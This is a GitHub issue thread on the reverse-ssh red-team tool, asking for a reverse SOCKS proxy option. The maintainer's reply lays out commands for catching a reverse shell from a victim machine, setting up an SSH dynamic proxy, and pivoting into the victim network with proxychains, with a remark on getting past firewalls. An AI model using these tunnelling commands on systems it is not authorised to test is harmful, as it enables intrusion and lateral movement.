### ISSUE TITLE
FeatureRequest: Add -R option for remote SOCKS connection

### ISSUE THREAD

**Issue by PfiatDe** [Fahrj/reverse-ssh#8]
It would be great to get the -R option from ssh.
` -R [bind_address:]port
             Specifies that connections to the given TCP port or Unix socket on the remote (server) host are to be forwarded to the local side.
This works by allocating a socket to listen to either a TCP port or to a Unix socket on the remote side.  Whenever a connection is made to this port or Unix socket, the connection is forwarded over the secure channel, and a connection is made from the local machine to either an explicit destination specified by host port hostport, or local_socket, or, if no explicit destination was specified, ssh will act as a SOCKS 4/5 proxy and forward connections to the destinations requested by the remote SOCKS client.
`

This would allow a reverse SOCKS connection, which can then be used from the attacker system with proxychains to reach systems in the victim network.
And as this would not be a bind shell, it might bypass firewall rules.

**Comment by rumpelsepp** [comment]
I have implemented SOCKS for go a while ago and this was used in production for some time: https://codeberg.org/rumpelsepp/socks5/src/branch/master/socks5.go

Might need a patch for the `go.mod` as I moved the module to codeberg. But the SOCKS5 stuff works and we might use this.

**Comment by Fahrj** [comment]
Hi @PfiatDe ,
I'm not sure whether I fully understand your scenario.

Local (`-L`), remote (`-R`) and dynamic (`-D`) port forwarding via ssh is already supported by ReverseSSH, as also briefly mentioned in the [Features](https://github.com/Fahrj/reverse-ssh/blob/master/Readme.md#features) and [Usage](https://github.com/Fahrj/reverse-ssh/blob/master/Readme.md#usage) sections of the Readme.

In detail, this means that after executing `reverse-ssh 192.168.0.1` on the victim machine and successfully catching the incoming _reverse shell_ (more precisely the port binding request via ssh), you can easily establish a SOCKS proxy listening on port 9050 from the attacker machine by executing `ssh -p 8888 -D 9050 127.0.0.1`. If you configure proxychains such that it uses this local SOCKS proxy on port 9050, you are able to reach machines available in the victim's network via the victim itself.

Admittedly, this encapsulates one ssh connection inside another, but I do not really see a performance issue here.

Now as I understand, you are suggesting to execute `reverse-ssh` on the victim in such a way that it directly binds to a certain port on the attacker machine, serving as SOCKS proxy. While I like this idea, I see it more as the task of an ssh _client_, rather than an ssh _server_, which ReverseSSH actually is. Moreover, it also brings in the question what to do with the "generic" ssh port: should it be replaced, or should it be coexisting? In any case it's implementation work for a feature that is already available, just with a small extra step.

In the end, I would thus refer you to the aforementioned way of creating a SOCKS Proxy, as I see it more in line with the idea of ReverseSSH and it being a statically linked ssh _server_.

If I misunderstood your proposal, please feel free to clarify!

@rumpelsepp: Thanks for the heads up, but right now I think we should leave it as is.

**Comment by PfiatDe** [comment]
I think you got my request right.
Looking in the link under the Section: "SOCKS Proxy"
https://posts.specterops.io/offensive-security-guide-to-ssh-tunnels-and-proxies-b525cbd4d4c6?
your solution is mentioned. 
Looking at "Reverse Dynamic Port Forward" the way I would prefer this is mentioned.

But of course, you can do this with the capsuled SSH connection, it would just be a "comfort feature", but you are again correct, this would be more of a ssh client feature, then a server (same like -D).
